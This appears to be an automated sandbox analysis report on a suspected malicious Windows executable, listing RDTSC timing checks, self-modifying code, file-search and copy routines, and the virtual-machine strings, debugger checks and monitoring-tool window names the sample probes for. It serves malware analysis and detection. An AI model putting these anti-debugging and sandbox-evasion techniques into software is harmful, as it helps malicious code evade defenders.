                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D938 second address: E0D93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E8C9 second address: E0E8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E8D1 second address: E0E8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F0F7085C596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C850 second address: E0C88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 popad 0x0000000a jmp 00007F0F70ECA9B5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 js 00007F0F70ECA9A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C88A second address: E0C88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C88E second address: E0C899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C899 second address: E0C8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C8AA second address: E0C8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C8AE second address: E0C8B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24016 second address: E2401C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E24170 second address: E24187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28A75 second address: E28A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37456 second address: E3745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37293 second address: E37297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37297 second address: E372C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ah 0x00000007 jno 00007F0F7085C598h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jc 00007F0F7085C596h 0x00000017 jmp 00007F0F7085C59Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD76 second address: E3DD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD80 second address: E3DD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DD84 second address: E3DDA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F70ECA9ADh 0x0000000b popad 0x0000000c pushad 0x0000000d jng 00007F0F70ECA9B2h 0x00000013 jbe 00007F0F70ECA9A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DDA7 second address: E3DDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0F7085C5A4h 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F0F7085C596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C71D second address: E3C737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C737 second address: E3C73C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CB30 second address: E3CB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3CB34 second address: E3CB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3D0F0 second address: E3D0FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F70ECA9ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3DA98 second address: E3DAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0F7085C596h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42016 second address: E42022 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F70ECA9A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C10 second address: E47C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F7085C59Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C29 second address: E47C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47C2E second address: E47C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47A86 second address: E47A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E47A8C second address: E47ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jc 00007F0F7085C5D5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0F7085C5A3h 0x0000001d jmp 00007F0F7085C5A4h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53AE3 second address: E53AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60808 second address: E6080E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6080E second address: E6083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0F70ECA9CBh 0x0000000c jmp 00007F0F70ECA9B9h 0x00000011 jmp 00007F0F70ECA9ACh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E609DB second address: E609E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708BF second address: E708E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F0F70ECA9BFh 0x0000000f jmp 00007F0F70ECA9B9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708E7 second address: E708EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708EF second address: E708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708F3 second address: E708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70A26 second address: E70A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70B7A second address: E70B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70B80 second address: E70B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70B86 second address: E70B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F7085C596h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E713F2 second address: E71442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F70ECA9B7h 0x00000009 jmp 00007F0F70ECA9AFh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F70ECA9B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0F70ECA9AFh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71442 second address: E71448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71448 second address: E71458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0F70ECA9A6h 0x0000000a jo 00007F0F70ECA9A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71458 second address: E7145C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E74115 second address: E74133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9B4h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E741EB second address: E74206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E74444 second address: E744E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0F70ECA9BBh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F0F70ECA9AEh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0F70ECA9A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2B43h] 0x00000033 push 00000004h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F0F70ECA9A8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jc 00007F0F70ECA9ACh 0x00000055 mov edx, dword ptr [ebp+12467678h] 0x0000005b push BD9BF3A5h 0x00000060 pushad 0x00000061 jng 00007F0F70ECA9ACh 0x00000067 ja 00007F0F70ECA9A6h 0x0000006d push eax 0x0000006e push edx 0x0000006f push edi 0x00000070 pop edi 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76FD3 second address: E76FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76FD7 second address: E76FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76FDF second address: E76FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76FE3 second address: E76FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76FFC second address: E7702A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F7085C59Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7702A second address: E7702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7702E second address: E77056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0F7085C5A0h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77056 second address: E77069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F70ECA9ADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E77069 second address: E7706D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7706D second address: E7707B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0F70ECA9ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561033C second address: 5610355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F7085C5A5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610355 second address: 561037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F70ECA9ADh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561037C second address: 5610397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov di, 796Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F7085C59Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610397 second address: 56103BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F70ECA9AFh 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, 8B83h 0x00000016 mov edi, eax 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56103BA second address: 56103E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007F0F7085C5A7h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, BEB7h 0x00000017 mov di, si 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610465 second address: 5610469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610469 second address: 561046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561046D second address: 5610473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610473 second address: 5610479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D98275 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DBE9E6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C01B1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C06CF6 rdtsc 0_2_00C06CF6
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_009ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_009AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_009AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_009ABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A1160 GetSystemInfo,ExitProcess,0_2_009A1160
                Source: file.exe, file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1771889897.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1771889897.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13513
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13510
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13529
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13525
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13564
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C06CF6 rdtsc 0_2_00C06CF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A45C0 VirtualProtect ?,00000004,00000100,000000000_2_009A45C0
